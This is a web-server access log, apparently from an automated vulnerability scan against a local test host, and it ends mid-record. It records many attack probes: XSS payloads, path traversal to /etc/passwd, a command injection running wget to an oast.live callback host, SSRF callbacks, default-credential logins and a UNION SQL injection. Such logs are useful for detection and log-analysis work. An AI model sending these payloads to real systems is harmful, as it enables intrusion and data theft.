+{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/..;/..;/..;/getFavicon?host=ca28fg0smpvbd3qg07h0834ycy8jput5n.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.jenkins.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Partners/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"------WebKitFormBoundaryB874qcjbpxTP1Hj7\x0D\x0AContent-Disposition: form-data; name=\x22csrf_token\x22\x0D\x0A\x0D\x0A{{csrf}}\x0D\x0A------WebKitFormBoundaryB874qcjbpxTP1Hj7\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2229KD1uvqssVvcBimV1EVlD4frsd.json\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0A{\x0D\x0A \x22type\x22: \x2229KD1uvqssVvcBimV1EVlD4frsd\x22\x0D\x0A}\x0D\x0A\x0D\x0A------WebKitFormBoundaryB874qcjbpxTP1Hj7--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /variable/varimport HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1/admin/variable/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static?/%2557EB-INF/web.xml HTTP/1.1","status":"301","body_bytes_sents":"169","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webconsole/webpages/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/admin/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup/index.php?page=servers&mode=test&id=\x22>'> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /network-login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/getuser?index=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search.php?search=%22;wget+http%3A%2F%2Fca28fg0smpvbd3qg07h0n84w1ftdah3c3.oast.live%27;%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.php?file=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /BSW_cxttongr.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /WEB_VMS/LEVEL15/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /radio/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.travis.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jejob&view=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /concat?/%2557EB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /userportal/webpages/myaccount/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /explore/snippets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('29KD22Jh8gkNDRW7Jd2t9RWXfDx')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/setup/index.php?page=servers&mode=test&id=\x22>'> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /browser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/cam_portal.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/spider.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /names.nsf/People?OpenView HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"btnPost=Log+In&username={{username}}&password=0a7ef986b3b5ab8a809774cf3d09ec16&savedate=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /zb_system/cmd.php?act=verify HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seminovos/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/auth/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OpenAM-11.0.0/ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rootDesc.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"return=index.php&username=administrator&password=root","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /-/snippets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('29KD22Jh8gkNDRW7Jd2t9RWXfDx')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/emq.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"username=airflow&password=airflow&_csrf_token={{csrf_token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/admin/airflow/login", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tips/tipsLogin.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sphider/admin/admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 